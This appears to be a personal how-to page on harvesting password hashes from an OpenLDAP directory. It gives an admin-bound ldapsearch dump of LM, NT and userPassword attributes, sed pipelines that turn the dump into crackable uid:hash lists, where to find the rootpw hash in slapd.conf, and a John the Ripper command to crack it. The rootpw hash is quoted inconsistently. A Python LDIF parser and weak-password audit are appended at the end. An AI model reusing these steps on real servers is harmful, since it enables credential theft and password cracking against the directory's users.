for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword \
  -h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL \
  -v "(objectClass=*)" sambaLMPassword > lmpassword
(line continuations are backslashes, not forward slashes; -W instead of -w apassword prompts for the bind password rather than leaving it in the process list and shell history)
i know that all valid accounts have this format:
dn: uid=username
some places have a dn: that differs from the valid logon id.
there the logon id is simply the attribute uid=username.
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled (their order is not fixed). more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp "$dumporig" "$dump"
sed -i '/ou=groups/d' $dump                          # remove groups as dumped
sed -i '/sambaDomainName/d' $dump                    # there are no passwords for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump                # admin has cn: as do others
sed -i '/^$/d' $dump                                 # blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump  # stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump   # removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump   # stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump           # removing dangling dn
sed -i '/dc=my/d' $dump                              # removing dangling dn
sed -i 's/dn:\ uid=//g' $dump                        # we only want uid
sed -i '/dn:\ /d' $dump                              # for records that only have a leading dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump                # fun with line breaks: join everything with a marker
sed -i 's/userPassword::/userPassword:/g' $dump      # converting attribute; some are :: others :
sed -i 's/userPassword//g' $dump                     # remove the attribute name altogether; one : remains
sed -i 's/blast:\ /:/g' $dump                        # fun
sed -i 's/blast/\n/g' $dump                          # convert fun to a new line
sed -i '/:/!d' $dump                                 # no : ? go away
sed -i '/^:/d' $dump                                 # start with : ? go away
sed -i 's/=//g' $dump                                # remove trailing = (the base64 padding of the userPassword value)
sort -u $dump > $dump.out                            # sort the output
rm $dump                                             # remove temp file
for LMPassword it is a little simpler.
NTPassword is the same: substitute sambaNTPassword for sambaLMPassword in the file names and in the
attribute strip when processing the file.
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump   # removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is the rootdn's password for accessing the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
however.
if you are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing every line containing either,
in the order they appear, to an output file.
easy. then you parse away.
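Both the sed pipelines above and the "parse away" step depend on reading LDIF correctly, and the author notes that attribute order is not fixed. As an added example (not the author's code), here is a small Python LDIF reader that handles folded lines and base64 ("::") values regardless of attribute order, plus an audit that reports which user entries still carry LM hashes or unsalted/cleartext userPassword values, which is what a directory owner would want to find and clean up. The sample dump is constructed; only the uid/ou/dc layout follows the page.

```python
import base64
# Constructed sample dump (not from the page): attribute order varies, userPassword is base64, one value is folded.
SAMPLE_LDIF = """\
dn: uid=alice,ou=users,dc=my,dc=pants,dc=com
uid: alice
sambaLMPassword: 0123456789ABCDEF0123456789ABCDEF
sambaNTPassword: FEDCBA9876543210FEDCBA9876543210
userPassword:: e1NTSEF9ZHVtbXlo
 YXNodmFsdWU=

dn: uid=bob,ou=yawn,dc=my,dc=pants,dc=com
sambaNTPassword: 00112233445566778899AABBCCDDEEFF
userPassword:: c2VjcmV0MQ==
"""

def parse_ldif(text):
    # One dict per entry (attribute -> list of decoded values), whatever the attribute order.
    entries, entry = [], {}
    # RFC 2849 folding: a newline followed by one space continues the previous line.
    for line in text.replace("\n ", "").splitlines() + [""]:  # trailing "" flushes the last entry
        if not line:
            if entry:
                entries.append(entry)
            entry = {}
        elif not line.startswith("#"):
            name, _, value = line.partition(":")
            if value.startswith(":"):  # "attr:: <base64>" form, as ldapsearch emits userPassword
                value = base64.b64decode(value[1:]).decode("utf-8", "replace")
            entry.setdefault(name, []).append(value.strip())
    return entries

WEAK_SCHEMES = {"CLEARTEXT", "MD5", "SHA"}  # unsalted, or not hashed at all

def audit_password_storage(entries):
    # Map uid -> findings for user entries; cn=admin, groups and sambaDomainName are skipped.
    findings = {}
    for e in entries:
        dn = e.get("dn", [""])[0]
        if not dn.startswith("uid="):
            continue
        uid = e.get("uid", [dn[4:].split(",")[0]])[0]  # no uid attribute? take the RDN value
        issues = ["LM hash stored"] if "sambaLMPassword" in e else []
        for pw in e.get("userPassword", []):
            scheme = pw[1:pw.find("}")].upper() if pw.startswith("{") and "}" in pw else "CLEARTEXT"
            if scheme in WEAK_SCHEMES:
                issues.append("userPassword uses " + scheme)
        if issues:
            findings[uid] = issues
    return findings
```

Run against a real dump with parse_ldif(open("ldif.out").read()); entries whose dn is not uid-based are ignored, so groups and the domain object need no separate sed deletions.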